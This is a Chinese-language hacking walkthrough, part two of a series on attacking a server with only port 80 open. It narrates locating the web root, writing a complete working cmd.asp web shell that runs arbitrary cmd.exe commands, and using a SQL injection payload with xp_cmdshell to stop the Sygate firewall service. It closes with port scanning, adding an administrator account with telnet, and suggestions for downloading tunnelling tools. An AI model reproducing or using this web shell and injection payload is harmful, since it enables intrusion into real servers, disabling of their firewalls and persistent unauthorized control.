只开80端口主机的安全检测(下)

第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径 
然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯 
执行http://x.x.x.x/dd.asp 
返回:d:\xxx 
看来我运气就是不错的哈(其实有个问题是我们找的第一个web站点可能并不能通过x.x.x.x来仿问) 
第四步:就是用echo命令生成cmd.asp,唉也不算长嘛也就20行而已 
其实在有的网站上(通常是虚拟主机)cmd.asp是不能执行的,不过这台主机是独立的服务器 
所以管理员就没有禁止了 

--------------------------cmd.asp------------------------------  <%On Error Resume Next  Set oＳcript = Server.CreateObject(""WＳcript.SHELL"")  Set oＳcriptNet = Server.CreateObject(""WＳcript.NETWORK"")  Set oFileSys = Server.CreateObject(""Ｓcripting.FileSystemObject"")  szCMD = Request.Form("".CMD"")  If (szCMD <> """")Then  szTempFile = ""C:\" & oFileSys.GetTempName()  Call oＳcript.Run (""cmd.exe /c "" & szCMD & "" > "" & szTempFile, 0, True)  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)  End If %>  <HTML><BODY><FORM action=""<%= Request.ServerVariables(""URL"")%>"" method=""POST"">  <input type=text name="".CMD"" size=45 value=""<%= szCMD %>""><input type=submit value=""Run"">  </FORM><PRE>  <% If (IsObject(oFile))Then  On Error Resume Next  Response.Write Server.HTMLEncode(oFile.ReadAll)  oFile.Close  Call oFileSys.DeleteFile(szTempFile, True)  End If%>  </BODY></HTML>  -----------------------cut here--------------------------------

第五步:执行cmd.asp三,这样我们可以找到系统上到底安的是什么防火墙,找啊找没多久我找到了 
e:\progra~1\sygate\spf,就是它不用说了嘛sygate personal firewall pro(具体版本在cmd.asp 
里执行echo readme.txt不就明白了) 
第六步:关闭sygate的防火墙 
a’;exec master..xp_cmdshell ’net stop smcservice’;-- 
(smcservice是sygate防火墙的服务名) 
第七步:看一看成功了吗?用x-scan扫,现在就对了三53,139,135,1433......都出来了 
第八步:添加系统管理员打开telnet............ 

唉打了半天反正就是这样了...其实我想应该还有好的办法只是我没想到吧....... 
比如说用echo命令写一个ftp脚本来下载一个httptunel之类的程序然后再打开telnet 
....当然你也可能想得到更简单的办法就是猜web站点的实际目录......